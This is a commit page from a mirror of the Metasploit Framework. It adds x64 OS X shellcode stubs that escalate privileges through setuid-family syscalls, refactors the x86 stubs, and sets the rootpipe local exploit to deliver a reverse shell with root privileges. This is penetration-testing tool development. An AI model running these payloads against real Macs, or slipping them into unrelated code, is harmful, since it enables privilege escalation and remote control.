infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #5127, x64 OS X prepend stubs 'n' stuff

bug/bundler_fix
William Vu 2015-04-14 01:25:39 -05:00
parent 8d1126eaa5 52fc60b294
commit e114c85044
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743
9 changed files with 157 additions and 101 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
lib/msf/core/payload/linux.rb
View File

@ -87,10 +87,6 @@ module Msf::Payload::Linux
ret
end
#
# Overload the generate() call to prefix our stubs
#
def apply_prepends(buf)
pre = ''
app = ''

238
lib/msf/core/payload/osx.rb
View File

@ -23,49 +23,49 @@ module Msf::Payload::Osx
[
false,
"Prepend a stub that executes the setresuid(0, 0, 0) system call",
"false"
false
]
),
Msf::OptBool.new('PrependSetreuid',
[
false,
"Prepend a stub that executes the setreuid(0, 0) system call",
"false"
false
]
),
Msf::OptBool.new('PrependSetuid',
[
false,
"Prepend a stub that executes the setuid(0) system call",
"false"
false
]
),
Msf::OptBool.new('PrependSetresgid',
[
false,
"Prepend a stub that executes the setresgid(0, 0, 0) system call",
"false"
false
]
),
Msf::OptBool.new('PrependSetregid',
[
false,
"Prepend a stub that executes the setregid(0, 0) system call",
"false"
false
]
),
Msf::OptBool.new('PrependSetgid',
[
false,
"Prepend a stub that executes the setgid(0) system call",
"false"
false
]
),
Msf::OptBool.new('AppendExit',
[
false,
"Append a stub that executes the exit(0) system call",
"false"
false
]
),
], Msf::Payload::Osx)
@ -73,95 +73,155 @@ module Msf::Payload::Osx
ret
end
#
# Overload the generate() call to prefix our stubs
#
def generate(*args)
# Call the real generator to get the payload
buf = super(*args)
def apply_prepends(buf)
test_arch = [ *(self.arch) ]
pre = ''
app = ''
test_arch = [ *(self.arch) ]
# Handle all x86 code here
if (test_arch.include?(ARCH_X86))
# Prepend
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x37\x01" +# movw $0x0137,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7e" +# movb $0x7e,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x17" +# movb $0x17,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x38\x01" +# movw $0x0138,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7f" +# movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xb5" +# movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
end
# Append
if (datastore['AppendExit'])
# exit(0)
app << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x01" +# movb $0x01,%al #
"\xcd\x80" # int $0x80 #
end
handle_x86_osx_opts(pre, app)
elsif (test_arch.include?(ARCH_X86_64))
handle_x64_osx_opts(pre, app)
end
return (pre + buf + app)
pre + buf + app
end
def handle_x86_osx_opts(pre, app)
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x37\x01" +# movw $0x0137,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7e" +# movb $0x7e,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x17" +# movb $0x17,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x38\x01" +# movw $0x0138,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7f" +# movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xb5" +# movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['AppendExit'])
# exit(0)
app << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x01" +# movb $0x01,%al #
"\xcd\x80" # int $0x80 #
end
end
def handle_x64_osx_opts(pre, app)
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
raise RuntimeError, "setresuid syscall is not implemented on x64 OSX systems"
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x7e" +# or r8, 126 (setreuid=126)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x17" +# or r8, 23 (setuid=23)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
raise RuntimeError, "setresgid syscall is not implemented on x64 OSX systems"
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x7f" +# or r8, 127 (setregid=127)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x17" +# shl r8, 23
"\x49\x83\xc8\x5a" +# or r8, 90 (setgid=181>>1=90)
"\x49\xd1\xe0" +# shl r8, 1
"\x49\x83\xc8\x01" +# or r8, 1 (setgid=181&1=1)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
end
if (datastore['AppendExit'])
# exit(0)
app << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x01" +# or r8, 1 (exit=1)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
end
end

4
modules/exploits/osx/local/rootpipe.rb
View File

@ -42,13 +42,13 @@ class Metasploit4 < Msf::Exploit::Local
'Platform' => 'osx',
'Arch' => ARCH_X86_64,
'SessionTypes' => ['shell'],
'Privileged' => true,
'Targets' => [
['Mac OS X 10.9-10.10.2', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'osx/x64/shell_reverse_tcp',
'CMD' => '/bin/zsh'
'PrependSetreuid' => true
}
))

2
modules/payloads/singles/osx/x86/exec.rb
View File

@ -17,7 +17,7 @@ require 'msf/core'
###
module Metasploit3
CachedSize = 81
CachedSize = 16
include Msf::Payload::Single
include Msf::Payload::Osx

2
modules/payloads/singles/osx/x86/shell_bind_tcp.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module Metasploit3
CachedSize = 139
CachedSize = 74
include Msf::Payload::Single
include Msf::Payload::Osx

2
modules/payloads/singles/osx/x86/shell_find_port.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module Metasploit3
CachedSize = 126
CachedSize = 61
include Msf::Payload::Single
include Msf::Payload::Osx

2
modules/payloads/singles/osx/x86/shell_reverse_tcp.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module Metasploit3
CachedSize = 130
CachedSize = 65
include Msf::Payload::Single
include Msf::Payload::Osx

2
modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module Metasploit3
CachedSize = 217
CachedSize = 152
include Msf::Payload::Single
include Msf::Payload::Osx

2
modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module Metasploit3
CachedSize = 196
CachedSize = 131
include Msf::Payload::Single
include Msf::Payload::Osx